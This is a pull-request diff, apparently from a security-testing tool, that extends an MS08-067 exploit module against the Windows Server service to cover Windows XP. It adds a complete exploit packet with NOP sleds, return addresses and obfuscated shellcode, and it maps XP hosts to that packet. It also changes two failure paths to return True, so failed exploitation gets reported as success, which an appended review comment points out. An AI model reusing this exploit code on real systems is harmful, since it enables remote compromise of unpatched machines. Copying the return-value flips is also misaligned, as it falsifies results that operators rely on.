Merge pull request #809 from VakarisZ/ms08-067
Added Windows XP support for win_ms08_067
7107e963fb
@ -50,6 +50,23 @@ OBFUSCATED_SHELLCODE = ("\xa9\xb6\x4a\x39\x56\x60\xb5\xba\xf6\xb2\xc0\x19\xc1\x6
|
|||
|
||||
SHELLCODE = clarify(OBFUSCATED_SHELLCODE)
|
||||
|
||||
XP_PACKET = ("\xde\xa4\x98\xc5\x08\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x41\x00\x42\x00\x43"
|
||||
"\x00\x44\x00\x45\x00\x46\x00\x47\x00\x00\x00\x36\x01\x00\x00\x00\x00\x00\x00\x36\x01"
|
||||
"\x00\x00\x5c\x00\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x41\x42\x43\x44\x45\x46\x47"
|
||||
"\x48\x49\x4a\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x41\x42\x43\x44\x45\x46\x47\x48"
|
||||
"\x49\x4a\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x41\x42\x43\x44\x45\x46\x47\x48\x49"
|
||||
"\x4a\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a"
|
||||
"\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x90"
|
||||
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
|
||||
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
|
||||
"\x90\x90\x90\x90\x90\x90\x90" + SHELLCODE + "\x5c\x00\x2e\x00\x2e\x00\x5c\x00\x2e\x00"
|
||||
"\x2e\x00\x5c\x00\x41\x00\x42\x00\x43\x00\x44\x00\x45\x00\x46\x00\x47\x00\x08\x04\x02"
|
||||
"\x00\xc2\x17\x89\x6f\x41\x41\x41\x41\x07\xf8\x88\x6f\x41\x41\x41\x41\x41\x41\x41\x41"
|
||||
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
|
||||
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x90\x90\x90\x90\x90\x90\x90\x90"
|
||||
"\xeb\x62\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x00\x00\xe8\x03\x00\x00\x02\x00\x00"
|
||||
"\x00\x00\x00\x00\x00\x02\x00\x00\x00\x5c\x00\x00\x00\x01\x10\x00\x00\x00\x00\x00\x00")
|
||||
|
||||
# Payload for Windows 2000 target
|
||||
PAYLOAD_2000 = '\x41\x00\x5c\x00\x2e\x00\x2e\x00\x5c\x00\x2e\x00\x2e\x00\x5c\x00'
|
||||
PAYLOAD_2000 += '\x41\x41\x41\x41\x41\x41\x41\x41'
|
||||
|
@ -82,6 +99,7 @@ PAYLOAD_2003 += '\xba\x77\xf9\x75\xbd\x77\x00\x00'
|
|||
class WindowsVersion(IntEnum):
|
||||
Windows2000 = 1
|
||||
Windows2003_SP2 = 2
|
||||
WindowsXP = 3
|
||||
|
||||
|
||||
class SRVSVC_Exploit(object):
|
||||
|
@ -91,6 +109,7 @@ class SRVSVC_Exploit(object):
|
|||
self._port = port
|
||||
self._target = target_addr
|
||||
self._payload = PAYLOAD_2000 if WindowsVersion.Windows2000 == os_version else PAYLOAD_2003
|
||||
self.os_version = os_version
|
||||
|
||||
def get_telnet_port(self):
|
||||
"""get_telnet_port()
|
||||
|
@ -129,6 +148,8 @@ class SRVSVC_Exploit(object):
|
|||
return sock
|
||||
|
||||
def _build_dce_packet(self):
|
||||
if self.os_version == WindowsVersion.WindowsXP:
|
||||
return XP_PACKET
|
||||
# Constructing Malicious Packet
|
||||
dce_packet = '\x01\x00\x00\x00'
|
||||
dce_packet += '\xd6\x00\x00\x00\x00\x00\x00\x00\xd6\x00\x00\x00'
|
||||
|
@ -157,7 +178,8 @@ class Ms08_067_Exploiter(HostExploiter):
|
|||
_TARGET_OS_TYPE = ['windows']
|
||||
_EXPLOITED_SERVICE = 'Microsoft Server Service'
|
||||
_windows_versions = {'Windows Server 2003 3790 Service Pack 2': WindowsVersion.Windows2003_SP2,
|
||||
'Windows Server 2003 R2 3790 Service Pack 2': WindowsVersion.Windows2003_SP2}
|
||||
'Windows Server 2003 R2 3790 Service Pack 2': WindowsVersion.Windows2003_SP2,
|
||||
'Windows 5.1': WindowsVersion.WindowsXP}
|
||||
|
||||
def __init__(self, host):
|
||||
super(Ms08_067_Exploiter, self).__init__(host)
|
||||
|
@ -231,7 +253,7 @@ class Ms08_067_Exploiter(HostExploiter):
|
|||
break
|
||||
|
||||
if not remote_full_path:
|
||||
return False
|
||||
return True
|
||||
|
||||
# execute the remote dropper in case the path isn't final
|
||||
if remote_full_path.lower() != self._config.dropper_target_path_win_32.lower():
|
||||
|
@ -251,7 +273,7 @@ class Ms08_067_Exploiter(HostExploiter):
|
|||
sock.send(("net user %s /delete\r\n" % (self._config.user_to_add,)).encode())
|
||||
except Exception as exc:
|
||||
LOG.debug("Error in post-debug phase while exploiting victim %r: (%s)", self.host, exc)
|
||||
return False
|
||||
return True
|
||||
finally:
|
||||
try:
|
||||
sock.close()
|
||||
|
|
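Review bot: The two `return False` → `return True` flips (the `if not remote_full_path:` branch in the @@ -231 hunk and the `except Exception` branch in the @@ -251 hunk) make the exploiter report a host as exploited when the dropper was never placed or when the post-exploitation step raised, so the result recorded for that host can be a false positive that the downstream report (not visible here) would trust; the enclosing method begins outside both hunks. If the intent is "the service was exploitable even though the follow-up failed", say so where the value is returned, e.g. `# Service was exploitable; dropper placement failed, still report the host as exploited` above the first `return True`, and consider lifting the second branch's `LOG.debug` to `LOG.warning` so the error that is now swallowed into a success result stays visible in operator logs. Separately, in the @@ -91 hunk `self._payload` still resolves to `PAYLOAD_2003` for `WindowsVersion.WindowsXP` even though `_build_dce_packet` returns `XP_PACKET` before touching it, which a reader may mistake for the XP payload; a one-line comment on that assignment, or leaving `_payload` unset for XP, would remove the ambiguity. `self.os_version` is also the only public attribute next to `_port`, `_target` and `_payload`; `self._os_version` would match the class's naming.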